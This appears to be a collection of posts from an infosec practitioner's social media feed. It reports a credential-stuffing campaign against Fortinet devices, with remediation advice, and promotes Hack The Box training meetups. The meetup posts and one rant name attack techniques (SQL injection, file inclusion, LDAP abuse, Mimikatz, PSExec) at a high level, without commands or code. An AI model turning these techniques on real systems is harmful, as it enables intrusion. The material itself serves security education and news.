‼️🚨 BREAKING: 320,000 Fortinet firewall devices have been targeted in a campaign that has been dubbed 'FortiBleed'. Attackers were able to confirm 75,000 working credentials against the admin and SSL VPN interfaces.
The victims include really big names like Samsung, Oracle, Spotify, Sony, and more.
The data was first surfaced by researcher Volodymyr "Bob" Diachenko and analyzed by Hudson Rock and SOCRadar. The operation runs as a self-feeding loop. Attackers scan the internet for exposed Fortinet devices, then test each one against a curated list of passwords leaked from earlier Fortinet breaches and infostealer logs. Every successful login gets recorded into a verified database. They then turn each compromised box into a listening post, sniffing the traffic passing through the firewall to harvest fresh credentials, which go straight back into the scanner.
The scale is large. The group ran an estimated 1.16 billion credential attempts against more than 320,000 FortiGate targets, plus 2.1 billion brute-force tries against 160,000 MSSQL servers. In the deeper intrusions they intercept SSL VPN authentication hashes, crack them on a dedicated 45-GPU cluster, and move into internal Active Directory.
Diachenko confirmed full network compromises in Japan, Taiwan, Vietnam, Iraq, and Turkey, including a Turkish NATO defense contractor that had classified defense documents stolen.
If you run Fortinet, act now: rotate every VPN and admin credential, enforce MFA on all external gateways, restrict management access to approved sources, segment internal networks, and audit gateway logs for unusual logins. Hudson Rock has a free domain lookup at https://t.co/KLv2YiMtpm.
Data surfaced via the Hunt Intelligence, Inc. feed.
@IceSolst Mine got suspended, I paid later and added my CPEs, then … abracadabra I’m reinstated. But I only need it as a “mandatory” on some contracts, so I maintain it (just enough to keep it).
@kmcnam1@alantrask1@rickmarazzani What the hell is wrong with people?? That’s insanity. Dudes getting upset because you’re teaching others is bonkers. Keep up the good work!
1997: Nmap was first released as a simple port scanner via an article in issue 51 of Phrack magazine which included the source code.
That's right - 28 years of Nmap!
Ding dong, the 2010s called – they want their TTPs back.
Amazing how you can still completely own companies using decade-old techniques:
- PSExec for RDP prep
- Mimikatz dumped in C:\PerfLogs
- LOLbin-fueled network recon
- A scheduled task beaconing to some shady IP
It still works. Because outside our infosec echo chamber, most orgs are stuck in 2005 – one antivirus, a firewall, and a prayer.
Meanwhile, we’re debating AI-driven XDR orchestration with autonomous response in the cloud. Reality check: most businesses can’t even tell if PSExec is on their network.
https://t.co/yTQnaGYcVr
🚀 Last Chance to Join @hackthebox_eu Ottawa Meetup #14 tomorrow!
Don’t miss out on this online event where we’ll dive into WifineticTwo, exploring vulnerabilities like Remote Code Execution and WPS attacks. Whether you’re a beginner or a pro, you’ll gain hands-on insights to boost your skills.
👩💻 When: December 19th, 6 PM ET
💻 Register Now: https://t.co/I2lMXa2I4G
Let’s hack, learn, and grow together. See you there! 🔐
@DavidJBianco Comments like “if you think ‘x’, you don’t know what you’re talking about” are what stifle careers. Especially from a SANS instructor, who is supposed to be helping and encouraging others. Why not educate, instead of generalizing, and try to help others?
🔍 Ready to put your detective skills to the test? Join us for the Sherlock Challenge on Hack The Box!
🗓️ Date: Thursday, 26 September 2024
⏰ Time: 6pm ET
🌐 Event: Online
🔗 Sign up here: https://t.co/2OPclqiRaX
Investigate and defend as you go through a complex cyber attack, testing your ability to uncover the truth! 🛡️
Are you up for the challenge? 🕵️♂️ #CyberSecurity #HackTheBox #SherlockChallenge #DefensiveSecurity #CTF #BlueTeam
See you there!
Love seeing this type of engagement in the @hackthebox_yow meetups! This may have been our best yet! Grateful to @cybermalvik for organizing and including me in the fun, and to everyone who joins us monthly for our #purpleteam escapades!
Shoutout to the organizing team for bringing this together, got to learn so much especially on the blue side of things with @bowersbrews and the host @cybermalvik .
🔥😂Ended up leaving the meet with a VIP+ voucher and 500 cubes. Thank you @hackthebox_yow@hackthebox_eu
This is going to be fun! Come watch JF watch his Red Team magic, and expect a bit more on the DFIR side coming from the Blue Team side of the house! #DFIR#Cybersecurity#Ottawa
New HTB Ottawa Meetup is coming August 29th.
Make sure you sign up and join the stream. Free access to a lab environment for pure hands-on experience. Education through videos and text is an excellent way to learn and get started, but Experience will hands down make you a better and more knowledgeable hacker.
Join us on the 29th online or Discord!
https://t.co/VK1rRv5WKg
Started this article a couple of years ago after a frustrating meeting. "Good Enough" does not end well, but you may never know if your detection measures are "Good Enough". Rant first, then some suggestions for improvement! #infosec#cybersecurity#rant
https://t.co/11u3M6rRts
🚀 HackTheBox Ottawa Meetup Event: StreamIO 🚀
Join us for an in-depth session on StreamIO, a Windows medium difficulty machine that tests your skills!
🟣 Purple Team Insights:
Explore both the offensive and defensive sides of cybersecurity, enhancing your understanding of comprehensive security strategies.
📅 Date & Time: Thursday, April 25th, 2024, at 6 PM
🔗 RSVP: https://t.co/qqTNjNHslg
🔍 What You’ll Uncover:
1. Subdomain Enumeration & SQL Injection: Explore hidden subdomains and exploit SQL injection for user credentials.
2. Local File Inclusion (LFI): Access and exploit admin panels and source code through LFI.
3. Privilege Escalation: Use LDAP abuse and PowerShell for higher-level access.
📚 Skills in Focus:
- SQL injections
- LFI with PHP wrappers and Source Code Review
- Remote File Inclusion exploitation
- Browser saved credentials retrieval and cracking
- LDAP enumeration and exploitation for lateral movement
- LDAP abuse for advanced privilege escalation
- LAPS password exposure
This session is a must-attend for anyone looking to sharpen their pentesting skills or delve into the world of cybersecurity!
#HackTheBox #StreamIO #CyberSecurity #Pentesting #PurpleTeam